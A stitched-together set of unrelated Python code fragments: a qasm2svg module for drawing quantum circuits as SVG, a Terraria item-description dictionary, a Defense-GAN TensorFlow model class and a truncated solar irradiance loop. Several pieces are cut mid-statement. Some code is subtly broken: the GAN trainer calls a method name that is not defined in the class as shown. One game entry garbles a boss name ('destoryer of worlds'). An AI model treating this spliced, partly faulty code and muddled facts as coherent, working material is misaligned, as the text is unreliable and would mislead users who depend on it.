# serialization. It converts the special format returned by the
# serialization back into a usable object.
# Using json.load()
# The JSON package has json.load() function that loads the json content from a json file into a | |
<gh_stars>1-10
# ======================================================================
# Copyright CERFACS (February 2018)
# Contributor: <NAME> (<EMAIL>)
#
# This software is governed by the CeCILL-B license under French law and
# abiding by the rules of distribution of free software. You can use,
# modify and/or redistribute the software under the terms of the
# CeCILL-B license as circulated by CEA, CNRS and INRIA at the following
# URL "http://www.cecill.info".
#
# As a counterpart to the access to the source code and rights to copy,
# modify and redistribute granted by the license, users are provided
# only with a limited warranty and the software's author, the holder of
# the economic rights, and the successive licensors have only limited
# liability.
#
# In this respect, the user's attention is drawn to the risks associated
# with loading, using, modifying and/or developing or reproducing the
# software by the user in light of its specific status of free software,
# that may mean that it is complicated to manipulate, and that also
# therefore means that it is reserved for developers and experienced
# professionals having in-depth computer knowledge. Users are therefore
# encouraged to load and test the software's suitability as regards
# their requirements in conditions enabling the security of their
# systems and/or data to be ensured and, more generally, to use and
# operate it in the same conditions as regards security.
#
# The fact that you are presently reading this means that you have had
# knowledge of the CeCILL-B license and that you accept its terms.
# ======================================================================
"""This module groups useful functions for qasm2svg.
The functions here are used in many places in the code of qasm2svg
and needed to be in a separate module.
"""
import os
from typing import Tuple, Sequence, Union
from qasm2image.svg import _constants, _types
QubitType = Tuple[str, int]
def get_x_from_index(index: int) -> int:
"""Compute the x-coordinate with the provided x index.
This method compute the x coordinate associated with the
given x index. The returned value has the same dimension as
the constants provided in _constants.py.
Parameters:
index (int): The circuit representation is divided in
columns. In each column fits a gate and some
additional space for gate separation. The
provided index represent the column in which
we want to plot.
Returns:
int: The *center* of the column that corresponds to the given
index.
___________
| |
| |
| |
| |
‾‾‾‾‾‾‾‾‾‾‾
^ ^
| returned value
not returned value
"""
x_coord = _constants.REGISTER_NAME_WIDTH
x_coord += _constants.GATE_LEFT_BORDER
x_coord += index * (
_constants.GATE_SIZE + _constants.GATE_HORIZONTAL_SPACING)
x_coord += _constants.GATE_SIZE / 2
return x_coord
def get_y_from_quantum_register(qreg_index_in_json: int,
bit_mapping: dict) -> int:
"""Compute the y-coordinate associated to the given quantum register.
This method assumes that all the quantum registers are drawn *before* the
classical ones.
Parameter:
quantum_register_index_in_JSON (int): identifier of the quantum
register from the JSON circuit representation.
bit_mapping (dict): the map that stores the correspondances between
bits indices in the JSON circuit and the desired output
indices.
Structure:
{'qubits': {index_in_JSON : index_in_drawing},
'clbits': {index_in_JSON : index_in_drawing}}
Returns:
int: The y-coordinate of the line representing the quantum register
number quantum_register_index.
"""
y_coord = _constants.VERTICAL_BORDER
index_to_draw = bit_mapping['qubits'][qreg_index_in_json]
y_coord += index_to_draw * _constants.REGISTER_LINES_VERTICAL_SPACING
return y_coord
def get_y_from_classical_register(clreg_index_in_json: int,
quantum_registers_number: int,
bit_mapping: dict) -> int:
"""Compute the y-coordinate associated to the given classical register.
This method assumes that all the quantum registers are drawn *before* the
classical ones.
Parameters:
clreg_index_in_json (int): identifier of the classical
from the JSON circuit representation.
quantum_registers_number (int): Number of quantum registers in the
circuit.
bit_mapping (dict): the map that stores the correspondances between
bits indices in the JSON circuit and the desired output
indices.
Structure:
{'qubits': {index_in_JSON : index_in_drawing},
'clbits': {index_in_JSON : index_in_drawing}}
Returns:
int: The y-coordinate of the line representing the classical register
number classical_register_index.
"""
y_coord = _constants.VERTICAL_BORDER
cl_index_to_draw = bit_mapping['clbits'][clreg_index_in_json]
index_to_draw = quantum_registers_number + cl_index_to_draw
y_coord += index_to_draw * _constants.REGISTER_LINES_VERTICAL_SPACING
return y_coord
def get_dimensions(json_circuit, show_clbits: bool) -> Tuple[int, int]:
"""Compute the width and height of the given circuit.
Parameter:
json_circuit (dict): JSON representation of the circuit. Can be obtained
from the QASM representation by the following
lines of code:
# qasm_str is the string containing the QASM code.
ast = qiskit.qasm.Qasm(data = qasm_str).parse()
u = qiskit.unroll.Unroller(ast, qiskit.unroll.JsonBackend(basis))
u.execute()
json_circuit = u.backend.circuit
show_clbits (bool): Flag set to True if the method should also draw
classical bits.
Returns:
tuple: The computed width and height of the given circuit.
"""
circuit_gates_number = _get_circuit_width(json_circuit)
register_number = json_circuit['header'].get('number_of_qubits', 0)
if show_clbits:
register_number += json_circuit['header'].get('number_of_clbits', 0)
width = _constants.REGISTER_NAME_WIDTH
width += _constants.GATE_LEFT_BORDER
width += circuit_gates_number * (
_constants.GATE_SIZE + _constants.GATE_HORIZONTAL_SPACING)
width -= _constants.GATE_HORIZONTAL_SPACING
width += _constants.GATE_RIGHT_BORDER
height = _constants.VERTICAL_BORDER
height += (register_number - 1) * _constants.REGISTER_LINES_VERTICAL_SPACING
height += _constants.VERTICAL_BORDER
return width, height
def _get_circuit_width(json_circuit) -> int:
"""Compute the width of the given circuit.
The returned width is not:
1) A number of pixel (or cm, mm, ...)
2) The *minimum* number of time steps needed to complete the
circuit.
Here the "width" is the number of columns needed to *represent clearly*
the circuit.
One situation where the returned integer does not correspond to the
definition given in 2) above could be
cx q[0], q[5];
cx q[1], q[6];
The 2 instructions above are completely independent and could be performed
in parallel (in one time step). But the graphic representations of these 2
instructions overlap: the CNOT lines will overlap between the qubits 1 and 5.
This situation will then output a "width" of 2, even if the width of the
circuit in the sense of quantum computing is 1.
Parameters:
json_circuit (dict): JSON representation of the circuit. Can be obtained
from the QASM representation by the following
lines of code:
# qasm_str is the string containing the QASM code.
ast = qiskit.qasm.Qasm(data = qasm_str).parse()
u = qiskit.unroll.Unroller(ast, qiskit.unroll.JsonBackend(basis))
u.execute()
json_circuit = u.backend.circuit
Returns:
int: The computed width of the given circuit.
"""
clbits_number = json_circuit['header'].get('number_of_clbits', 0)
qubits_number = json_circuit['header'].get('number_of_qubits', 0)
index_last_gate_on_reg = {
'clbits': [0] * max(clbits_number, 1),
'qubits': [0] * max(qubits_number, 1)}
# For each instruction
for instruction in json_circuit['instructions']:
_update_data_structure(index_last_gate_on_reg, instruction)
return max(max(index_last_gate_on_reg['clbits']),
max(index_last_gate_on_reg['qubits']))
def get_max_index(bit_gate_rank: _types.BitRankType, instruction=None,
qubits=None, clbits=None) -> \
Tuple[int, Tuple[int, int, int, int]]:
"""Compute the maximum x index with an overlap.
The maximum x index with an overlap is the maximum column index
where the representation of the 'instruction' (see below) would
overlap with an already drawn gate representation.
The algorithm to determine the 'instruction' is:
1) If the instruction parameter is not None, then data is extracted
from it.
2) If the instruction parameter is None and at least one of the qubits
and clbits parameters is set, then data is extracted from the
qubits and clbits parameters.
3) Else, an exception is raised.
Parameters:
bit_gate_rank (dict): Dictionnary representing the column index
of the last drawn gate for each bit.
Structure: {'qubits' : [ 3, # last drawn gate on the first qubit
# is in the third column.
2,
...,
10 ], # last drawn gate on the last qubit
# is in the tenth column.
'clbits' : [ 1, # last drawn gate on the first
classical
# bit is on the first column.
...,
0 ]
}
instruction (dict): Dictionnary representing the current instruction.
Structure: see qiskit data structures.
qubits (list): A list of quantum bits.
clbits (list): A list of classical bits.
Returns:
tuple: (max_index, (minq, maxq, minc, maxc)):
- max_index (int): the maximum x index with an overlap.
- minq (int): smallest qubit index used.
- maxq (int): greatest qubit index used.
- minc (int): smallest classical bit index used.
- maxc (int): greatest classical bit index used.
You can iterate on all the register indexes where something will
be drawn with
for qreg_index in range(minq, maxq+1):
# code
for creg_index in range(minq, maxq+1):
# code
The ranges can be empty, i.e. it is possible that minq = 0 and
maxq = -1 or minc = 0 and maxc = -1.
Raises:
RuntimeError: when no instruction, no qubits and no clbits are given | |
# "Skeleton Statue": "",
# "Reaper Statue": "",
# "Woman Statue": "",
# "Imp Statue": "",
# "Gargoyle Statue": "",
# "Gloom Statue": "",
# "Hornet Statue": "",
# "Bomb Statue": "",
# "Crab Statue": "",
# "Hammer Statue": "",
# "Potion Statue": "",
# "Spear Statue": "",
# "Cross Statue": "",
# "Jellyfish Statue": "",
# "Bow Statue": "",
# "Boomerang Statue": "",
# "Boot Statue": "",
# "Chest Statue": "",
# "Bird Statue": "",
# "Axe Statue": "",
# "Corrupt Statue": "",
# "Tree Statue": "",
# "Anvil Statue": "",
# "Pickaxe Statue": "",
# "Mushroom Statue": "",
# "Eyeball Statue": "",
# "Pillar Statue": "",
# "Heart Statue": "",
# "Pot Statue": "",
# "Sunflower Statue": "",
# "King Statue": "",
# "Queen Statue": "",
# "Piranha Statue": "",
# "Planked Wall": "",
# "Wooden Beam": "",
# "Adamantite Repeater": "",
# "Adamantite Sword": "",
# "Cobalt Sword": "",
# "Mythril Sword": "",
# "Moon Charm": "",
# "Ruler": "",
# "Crystal Ball": "",
# "Disco Ball": "",
# "Sorcerer Emblem": "",
# "Warrior Emblem": "",
# "Ranger Emblem": "",
# "Demon Wings": "",
# "Angel Wings": "",
# "Magical Harp": "",
# "Rainbow Rod": "",
# "Ice Rod": "",
# "Neptune's Shell": "",
# "Mannequin": "",
# "Greater Healing Potion": "",
# "Greater Mana Potion": "",
# "Pixie Dust": "",
# "Crystal Shard": "",
# "Clown Hat": "",
# "Clown Shirt": "",
# "Clown Pants": "",
# "Flamethrower": "",
# "Bell": "",
# "Harp": "",
# "Red Wrench": "",
# "Wire Cutter": "",
# "Active Stone Block": "",
# "Inactive Stone Block": "",
# "Lever": "",
# "Laser Rifle": "",
# "Crystal Bullet": "",
"Holy Arrow": "made with 200 wooden arrow, 3 pixie dust and 1 unicorn horn",
# "Magic Dagger": "",
# "Crystal Storm": "",
# "Cursed Flames": "",
# "Soul of Light": "",
# "Soul of Night": "",
# "Cursed Flame": "",
"Cursed Torch": "cursed torches are made with 33 torches and 1 cursed flame",
# "Adamantite Forge": "",
# "Mythril Anvil": "",
# "Unicorn Horn": "",
# "Dark Shard": "",
# "Light Shard": "",
# "Red Pressure Plate": "",
# "Wire": "",
# "Spell Tome": "",
# "Star Cloak": "",
# "Megashark": "",
# "Shotgun": "",
# "Philosopher's Stone": "",
# "Titan Glove": "",
# "Cobalt Naginata": "",
# "Switch": "",
# "Dart Trap": "",
# "Boulder": "",
# "Green Pressure Plate": "",
# "Gray Pressure Plate": "",
# "Brown Pressure Plate": "",
# "Mechanical Eye": "",
"Cursed Arrow": "made with 150 wooden arrow and 1 cursed flame",
"Cursed Bullet": "",
"Soul of Fright": "soul of fright is dropped by defeating skeletron prime",
"Soul of Might": "soul of might is dropped by defeating destoryer of worlds",
"Soul of Sight": "soul of sight is dropped by defeating the twins",
# "Gungnir": "",
# "Hallowed Plate Mail": "",
# "Hallowed Greaves": "",
# "Hallowed Helmet": "",
# "Cross Necklace": "",
# "Mana Flower": "",
# "Mechanical Worm": "",
# "Mechanical Skull": "",
# "Hallowed Headgear": "",
# "Hallowed Mask": "",
# "Slime Crown": "",
# "Light Disc": "",
# "Music Box (Overworld Day)": "",
# "Music Box (Eerie)": "",
# "Music Box (Night)": "",
# "Music Box (Title)": "",
# "Music Box (Underground)": "",
# "Music Box (Boss 1)": "",
# "Music Box (Jungle)": "",
# "Music Box (Corruption)": "",
# "Music Box (Underground Corruption)": "",
# "Music Box (The Hallow)": "",
# "Music Box (Boss 2)": "",
# "Music Box (Underground Hallow)": "",
# "Music Box (Boss 3)": "",
# "Soul of Flight": "",
# "Music Box": "",
# "Demonite Brick": "",
# "Hallowed Repeater": "",
# "Drax": "",
# "Explosives": "",
# "Inlet Pump": "",
# "Outlet Pump": "",
# "1 Second Timer": "",
# "3 Second Timer": "",
# "5 Second Timer": "",
# "Candy Cane Block": "",
# "Candy Cane Wall": "",
# "Santa Hat": "",
# "Santa Shirt": "",
# "Santa Pants": "",
# "Green Candy Cane Block": "",
# "Green Candy Cane Wall": "",
# "Snow Block": "",
# "Snow Brick": "",
# "Snow Brick Wall": "",
# "Blue Light": "",
# "Red Light": "",
# "Green Light": "",
# "Blue Present": "",
# "Green Present": "",
# "Yellow Present": "",
# "Snow Globe": "",
# "Carrot": "",
# "Adamantite Beam": "",
# "Adamantite Beam Wall": "",
# "Demonite Brick Wall": "",
# "Sandstone Brick": "",
# "Sandstone Brick Wall": "",
# "Ebonstone Brick": "",
# "Ebonstone Brick Wall": "",
# "Red Stucco": "",
# "Yellow Stucco": "",
# "Green Stucco": "",
# "Gray Stucco": "",
# "Red Stucco Wall": "",
# "Yellow Stucco Wall": "",
# "Green Stucco Wall": "",
# "Gray Stucco Wall": "",
# "Ebonwood": "",
# "<NAME>any": "",
# "Pearlwood": "",
# "Ebonwood Wall": "",
# "Rich Mahogany Wall": "",
# "Pearlwood Wall": "",
# "Ebonwood Chest": "",
# "Rich Mahogany Chest": "",
# "Pearlwood Chest": "",
# "Ebonwood Chair": "",
# "Rich Mahogany Chair": "",
# "Pearlwood Chair": "",
# "Ebonwood Platform": "",
# "Rich Mahogany Platform": "",
# "Pearlwood Platform": "",
# "Bone Platform": "",
# "Ebonwood Work Bench": "",
# "Rich Mahogany Work Bench": "",
# "Pearlwood Work Bench": "",
# "Ebonwood Table": "",
# "Rich Mahogany Table": "",
# "Pearlwood Table": "",
# "Ebonwood Piano": "",
# "<NAME> Piano": "",
# "Pearlwood Piano": "",
# "Ebonwood Bed": "",
# "Rich Mahogany Bed": "",
# "Pearlwood Bed": "",
# "Ebonwood Dresser": "",
# "Rich Mahogany Dresser": "",
# "Pearlwood Dresser": "",
# "Ebonwood Door": "",
# "Rich Mahogany Door": "",
# "Pearlwood Door": "",
# "Ebonwood Sword": "",
# "Ebonwood Hammer": "",
# "Ebonwood Bow": "",
# "Rich Mahogany Sword": "",
# "Rich Mahogany Hammer": "",
# "Rich Mahogany Bow": "",
# "Pearlwood Sword": "",
# "Pearlwood Hammer": "",
# "Pearlwood Bow": "",
# "Rainbow Brick": "",
# "Rainbow Brick Wall": "",
# "Ice Block": "",
# "Red's Wings": "",
# "Red's Helmet": "",
# "Red's Breastplate": "",
# "Red's Leggings": "",
# "Fish": "",
# "Ice Boomerang": "",
# "Keybrand": "",
# "Cutlass": "",
# "Boreal Wood Work Bench": "",
# "True Excalibur": "",
# "True Night's Edge": "",
# "Frostbrand": "",
# "Boreal Wood Table": "",
# "Red Potion": "",
# "Tactical Shotgun": "",
# "Ivy Chest": "",
# "Ice Chest": "",
# "Marrow": "",
# "Unholy Trident": "",
# "Frost Helmet": "",
# "Frost Breastplate": "",
# "Frost Leggings": "",
# "Tin Helmet": "",
# "Tin Chainmail": "",
# "Tin Greaves": "",
# "Lead Helmet": "",
# "Lead Chainmail": "",
# "Lead Greaves": "",
# "<NAME>": "",
# "<NAME>": "",
# "<NAME>": "",
# "Platinum Helmet": "",
# "Platinum Chainmail": "",
# "Platinum Greaves": "",
"Tin Ore": "tin ore can be found on or near the surface, in the cavern biome or underground and can be mined with any pickaxe.",
# "Lead Ore": "",
# "Tungsten Ore": "",
"Platinum Ore": "platinum ore can be found underground",
"Tin Bar": "A tin bar can be made using the furnace to smelt three tin ore",
# "Lead Bar": "",
# "Tungsten Bar": "",
"Platinum Bar": "A platinum bar can be made using the furnace to smelt four platinum ore.",
# "Tin Watch": "",
# "Tungsten Watch": "",
# "Platinum Watch": "",
# "Tin Chandelier": "",
# "Tungsten Chandelier": "",
# "Platinum Chandelier": "",
# "Platinum Candle": "",
# "Platinum Candelabra": "",
# "Platinum Crown": "",
# "Lead Anvil": "",
# "Tin Brick": "",
# "Tungsten Brick": "",
# "Platinum Brick": "",
# "Tin Brick Wall": "",
# "Tungsten Brick Wall": "",
# "Platinum Brick Wall": "",
# "Beam Sword": "",
# "Ice Blade": "",
# "Ice Bow": "",
# "Frost Staff": "",
# "Wood Helmet": "",
# "Wood Breastplate": "",
# "Wood | |
# Copyright 2018 The Defense-GAN Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Contains the GAN implementations of the abstract model class."""
import cPickle
import os
import time
import numpy as np
import tensorflow as tf
from tensorflow.contrib import slim
import tflib
import tflib.cifar10
import tflib.mnist
import tflib.plot
import tflib.save_images
from datasets.utils import get_generators
from models.base_model import AbstractModel
from models.dataset_models import mnist_generator, celeba_discriminator, \
mnist_discriminator, celeba_generator
from utils.misc import ensure_dir
from utils.visualize import save_images_files
class DefenseGANBase(AbstractModel):
def __init__(self, cfg=None, test_mode=False, verbose=True, **args):
default_attributes = ['dataset_name', 'batch_size', 'use_bn',
'test_batch_size',
'mode', 'gradient_penalty_lambda', 'train_iters',
'critic_iters', 'latent_dim', 'net_dim',
'input_transform_type',
'debug', 'rec_iters', 'image_dim', 'rec_rr',
'rec_lr', 'test_again', 'loss_type',
'attribute']
self.dataset_name = None # Name of the datsaet.
self.batch_size = 32 # Batch size for training the GAN.
self.use_bn = True # Use batchnorm in the discriminator and generator.
self.test_batch_size = 20 # Batch size for test time.
self.mode = 'gp-wgan' # The mode of training the GAN (default: gp-wgan).
self.gradient_penalty_lambda = 10.0 # Gradient penalty scale.
self.train_iters = 30000 # Number of training iterations.
self.critic_iters = 5 # Critic iterations per training step.
self.latent_dim = None # The dimension of the latent vectors.
self.net_dim = None # The complexity of network per layer.
self.input_transform_type = 0 # The normalization used for the inputs.
self.debug = False # Debug info will be printed.
self.rec_iters = 200 # Number of reconstruction iterations.
self.image_dim = [None, None, None] # [height, width, number of channels] of the output image.
self.rec_rr = 10 # Number of random restarts for the reconstruction
self.rec_lr = 10.0 # The reconstruction learning rate.
self.test_again = False # If true, do not use the cached info for test phase.
self.attribute = 'gender'
# Should be implemented in the child classes.
self.discriminator_fn = None
self.generator_fn = None
self.train_data_gen = None
self.model_save_name = 'GAN.model'
super(DefenseGANBase, self).__init__(default_attributes,
test_mode=test_mode,
verbose=verbose, cfg=cfg, **args)
self.save_var_prefixes = ['Generator', 'Discriminator']
if self.mode == 'enc':
saver = tf.train.Saver(
var_list=self.generator_vars + self.enc_params)
else:
saver = tf.train.Saver(var_list=self.generator_vars)
self.load_generator = lambda ckpt_path=None: self.load(
checkpoint_dir=ckpt_path, saver=saver)
self._load_dataset()
def _build_generator_discriminator(self):
"""Creates the generator and discriminator graph per dataset."""
pass
def _load_dataset(self):
"""Loads the dataset."""
pass
def _build(self):
"""Builds the computation graph."""
assert (self.batch_size % self.rec_rr) == 0, 'Batch size ' \
'should be ' \
'divisable by ' \
'random restart'
self.test_batch_size = self.batch_size
# Defining batch_size in input placeholders is inevitable at least
# for now, because the z vectors are Tensorflow variables.
self.real_data_pl = tf.placeholder(
tf.float32, shape=[self.batch_size] + self.image_dim,
)
self.real_data_test_pl = tf.placeholder(
tf.float32, shape=[self.test_batch_size] + self.image_dim,
)
self.input_pl_transform()
self._build_generator_discriminator()
self.fake_data = self.generator_fn()
self.disc_real = self.discriminator_fn(self.real_data)
with tf.variable_scope(tf.get_variable_scope(), reuse=True):
sc = tf.get_variable_scope()
sc.reuse_variables()
self.disc_fake = self.discriminator_fn(self.fake_data)
self.generator_vars = slim.get_variables('Generator')
self.discriminator_vars = slim.get_variables('Discriminator')
self.fixed_noise = tf.constant(
np.random.normal(size=(128, self.latent_dim)).astype(
'float32'))
self.fixed_noise_samples = self.generator_fn(self.fixed_noise,
is_training=False)
def _loss(self):
"""Builds the loss part of the graph.."""
self.discriminator_cost = 0
self.generator_cost = 0
if self.mode == 'wgan':
self.generator_cost = -tf.reduce_mean(self.disc_fake)
self.discriminator_cost = tf.reduce_mean(
self.disc_fake) - tf.reduce_mean(
self.disc_real)
self.gen_train_op = tf.train.RMSPropOptimizer(
learning_rate=5e-5
).minimize(self.generator_cost, var_list=self.generator_vars)
self.disc_train_op = tf.train.RMSPropOptimizer(
learning_rate=5e-5
).minimize(self.discriminator_cost,
var_list=self.discriminator_vars)
clip_ops = []
for var in tflib.params_with_name('Discriminator'):
clip_bounds = [-.01, .01]
clip_ops.append(
tf.assign(
var,
tf.clip_by_value(var, clip_bounds[0], clip_bounds[1])
)
)
self.clip_disc_weights = tf.group(*clip_ops)
elif self.mode == 'wgan-gp':
self.generator_cost = -tf.reduce_mean(self.disc_fake)
disc_cost = tf.reduce_mean(self.disc_fake) - tf.reduce_mean(
self.disc_real)
alpha = tf.random_uniform(
shape=[self.batch_size, 1, 1, 1],
minval=0.,
maxval=1.
)
differences = self.fake_data - self.real_data
interpolates = self.real_data + (alpha * differences)
gradients = \
tf.gradients(self.discriminator_fn(interpolates),
[interpolates])[0]
slopes = tf.sqrt(
tf.reduce_sum(tf.square(gradients), reduction_indices=[1]))
gradient_penalty = tf.reduce_mean((slopes - 1.) ** 2)
self.discriminator_cost = disc_cost + \
self.gradient_penalty_lambda * \
gradient_penalty
self.gen_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(self.generator_cost, var_list=self.generator_vars)
self.disc_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(self.discriminator_cost,
var_list=self.discriminator_vars)
self.clip_disc_weights = None
elif self.mode == 'dcgan':
self.generator_cost = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
self.disc_fake,
tf.ones_like(self.disc_fake)
))
disc_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
self.disc_fake,
tf.zeros_like(self.disc_fake)
))
disc_cost += tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
self.disc_real,
tf.ones_like(self.disc_real)
))
self.discriminator_cost = disc_cost / 2.
self.gen_train_op = tf.train.AdamOptimizer(
learning_rate=2e-4,
beta1=0.5
).minimize(self.generator_cost, var_list=self.generator_vars)
self.disc_train_op = tf.train.AdamOptimizer(
learning_rate=2e-4,
beta1=0.5
).minimize(disc_cost, var_list=self.discriminator_vars)
self.clip_disc_weights = None
def _generate_image(self, training_iter):
"""Generates a set of sample images from fixed noise and log them in
the `debug` directory.
Args:
training_iter: The training iteration to include as part of the
filename.
"""
samples = self.sess.run(self.fixed_noise_samples)
tflib.save_images.save_images(
samples.reshape((128, 28, 28)),
os.path.join(self.checkpoint_dir.replace('output', 'debug'),
'samples_{}.png'.format(training_iter))
)
def _inf_train_gen(self):
"""A generator function for input training data."""
while True:
for images, targets in self.train_data_gen():
yield images
def train(self, phase=None):
"""Trains the GAN model."""
sess = self.sess
self.initialize_uninitialized()
gen = self._inf_train_gen()
could_load = self.load(checkpoint_dir=self.checkpoint_dir,
prefixes=self.save_var_prefixes)
if could_load:
print('[*] Model loaded.')
else:
print('[#] No model found')
cur_iter = self.sess.run(self.global_step)
max_train_iters = self.train_iters
step_inc = self.global_step_inc
global_step = self.global_step
ckpt_dir = self.checkpoint_dir
for iteration in xrange(cur_iter, max_train_iters):
start_time = time.time()
if iteration > 0 and 'gan' in self.mode and phase is None:
_ = sess.run(self.gen_train_op,
feed_dict={self.is_training: 1})
if self.mode == 'dcgan':
disc_iters = 1
else:
disc_iters = self.critic_iters
for i in xrange(disc_iters):
_data = gen.next()
_disc_cost, _ = sess.run(
[self.discriminator_cost, self.disc_train_op],
feed_dict={self.real_data_pl: _data,
self.is_training: 1}
)
if self.clip_disc_weights is not None:
_ = sess.run(self.clip_disc_weights)
tflib.plot.plot('{}/train disc cost'.format(self.debug_dir),
_disc_cost)
tflib.plot.plot('{}/time'.format(self.debug_dir),
time.time() - start_time)
# Calculate dev loss and generate samples every 100 iters.
if iteration % 100 == 5:
dev_disc_costs = []
dev_ctr = 0
for images, _ in self.dev_gen():
dev_ctr += 1
if dev_ctr > 20:
break
_dev_disc_cost = sess.run(
self.discriminator_cost,
feed_dict={self.real_data_pl: images,
self.is_training: 0}
)
dev_disc_costs.append(_dev_disc_cost)
tflib.plot.plot('{}/dev disc cost'.format(self.debug_dir),
np.mean(dev_disc_costs))
self.generate_image(iteration)
# Write logs every 100 iters
if (iteration < 5) or (iteration % 100 == 99):
tflib.plot.flush()
self.sess.run(step_inc)
if iteration % 500 == 499:
self.save(checkpoint_dir=ckpt_dir, global_step=global_step)
tflib.plot.tick()
self.save(checkpoint_dir=ckpt_dir, global_step=global_step)
self.close_session()
def reconstruct(
self, images, batch_size=None, back_prop=True,
reconstructor_id=0, z_init_val=None):
"""Creates the reconstruction op for Defense-GAN.
Args:
X: Input tensor
Returns:
The `tf.Tensor` of the reconstructed input.
"""
# Batch size is needed because the latent codes are `tf.Variable`s and
# need to be built into TF's static graph beforehand.
batch_size = batch_size if batch_size else self.test_batch_size
x_shape = images.get_shape().as_list()
x_shape[0] = batch_size
# Repeat images self.rec_rr times to handle random restarts in
# parallel.
images_tiled_rr = tf.reshape(
images, [x_shape[0], np.prod(x_shape[1:])])
images_tiled_rr = tf.tile(images_tiled_rr, [1, self.rec_rr])
images_tiled_rr = tf.reshape(
images_tiled_rr, [x_shape[0] * self.rec_rr] + x_shape[1:])
# Number of reconstruction iterations.
with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
rec_iter_const = tf.get_variable(
'rec_iter_{}'.format(reconstructor_id),
initializer=tf.constant(0),
trainable=False, dtype=tf.int32,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
)
# The latent variables.
z_hat = tf.get_variable(
'z_hat_rec_{}'.format(reconstructor_id),
shape=[batch_size * self.rec_rr, self.latent_dim],
dtype=tf.float32,
initializer=tf.random_normal_initializer(
stddev=np.sqrt(1.0 / self.latent_dim)),
collections=[tf.GraphKeys.LOCAL_VARIABLES]
)
# Learning rate for reconstruction.
rec_lr_op_from_const = self.get_learning_rate(init_lr=self.rec_lr,
global_step=rec_iter_const,
decay_mult=0.1,
decay_iter=np.ceil(
self.rec_iters *
0.8).astype(
np.int32))
# The optimizer.
rec_online_optimizer = tf.train.MomentumOptimizer(
learning_rate=rec_lr_op_from_const, momentum=0.7,
name='rec_optimizer')
init_z = tf.no_op()
if z_init_val is not None:
init_z = tf.assign(z_hat, z_init_val)
z_hats_recs = self.generator_fn(z_hat, is_training=False)
num_dim = len(z_hats_recs.get_shape())
axes = range(1, num_dim)
image_rec_loss = tf.reduce_mean(
tf.square(z_hats_recs - images_tiled_rr),
axis=axes)
rec_loss = tf.reduce_sum(image_rec_loss)
rec_online_optimizer.minimize(rec_loss, var_list=[z_hat])
def rec_body(i, *args):
z_hats_recs = self.generator_fn(z_hat, is_training=False)
image_rec_loss = tf.reduce_mean(
tf.square(z_hats_recs - images_tiled_rr),
axis=axes)
rec_loss = tf.reduce_sum(image_rec_loss)
train_op = rec_online_optimizer.minimize(rec_loss,
var_list=[z_hat])
return tf.tuple(
[tf.add(i, 1), rec_loss, image_rec_loss, z_hats_recs],
control_inputs=[train_op])
rec_iter_condition = lambda i, *args: tf.less(i, self.rec_iters)
for opt_var in rec_online_optimizer.variables():
tf.add_to_collection(
tf.GraphKeys.LOCAL_VARIABLES,
opt_var,
)
with tf.control_dependencies([init_z]):
online_rec_iter, online_rec_loss, online_image_rec_loss, \
all_z_recs = tf.while_loop(
rec_iter_condition,
rec_body,
[rec_iter_const, rec_loss, image_rec_loss, z_hats_recs]
, parallel_iterations=1, back_prop=back_prop,
swap_memory=False)
final_recs = []
for i in range(batch_size):
ind = i * self.rec_rr + tf.argmin(
online_image_rec_loss[
i * self.rec_rr:(i + 1) * self.rec_rr
],
axis=0)
final_recs.append(all_z_recs[tf.cast(ind, tf.int32)])
online_rec = tf.stack(final_recs)
return tf.reshape(online_rec, x_shape)
def reconstruct_dataset(self, ckpt_path=None, max_num=-1, max_num_load=-1):
"""Reconstructs the images of the config's dataset with the generator.
"""
if not self.initialized:
self.load_generator(ckpt_path=ckpt_path)
splits = ['train', 'dev', 'test']
rec = self.reconstruct(self.real_data_test)
self.sess.run(tf.local_variables_initializer())
rets = {}
for split in splits:
if max_num > 0:
output_dir = os.path.join(self.checkpoint_dir,
'recs_rr{:d}_lr{:.5f}_'
'iters{:d}_num{:d}'.format(
self.rec_rr, self.rec_lr,
self.rec_iters, max_num),
split)
else:
output_dir = | |
index1):
actualGroundGHI += frontGroundGHI[k] * (k + 1.0 - projectedX1);
elif (k == index2):
if (k < 100):
actualGroundGHI += frontGroundGHI[k] * (projectedX2 - k);
else:
actualGroundGHI += frontGroundGHI[k - 100] * (projectedX2 - k);
else:
if (k < 100):
actualGroundGHI += frontGroundGHI[k];
else:
actualGroundGHI += frontGroundGHI[k - 100];
actualGroundGHI /= projectedX2 - projectedX1; # Irradiance on ground in the 1 degree field of view
#if (i == 0)
# Console.WriteLine("j=0 index1=1 index2=2 projectX1=3,5:0.0 projectX2=4,5:0.0 actualGrdGHI=5,6:0.0", j, index1, index2, projectedX1, projectedX2, actualGroundGHI);
frontGTI[i] += 0.5 * (math.cos(j * DTOR) - math.cos((j + 1) * DTOR)) * SegAOIcor[index][j] * actualGroundGHI * albedo; # Add ground reflected component
frontReflected[i] += 0.5 * (math.cos(j * DTOR) - math.cos((j + 1) * DTOR)) * actualGroundGHI * albedo * (1.0 - SegAOIcor[index][j] * (1.0 - Ro)); # Reflected ground radiation from module
#Console.WriteLine("actualGroundGHI = 0,6:0.0 inputGHI = 1,6:0.0 aveArrayGroundGHI = 2,6:0.0", actualGroundGHI, dhi + dni * math.cos(zen), aveGroundGHI);
# End of j loop for adding ground reflected componenet
# Calculate and add direct and circumsolar irradiance components
inc, tiltr, sazmr = sunIncident(0, beta / DTOR, sazm / DTOR, 45.0, zen, azm) # For calling PerezComp to break diffuse into components for 90 degree tilt (vertical)
# print "sunIncident 2."
# print "inc = ", inc
# print "tiltr = ", tiltr
# print "sazmr = ", sazmr
# print " INCIDENT REALY NEEDED for AOI ", inc
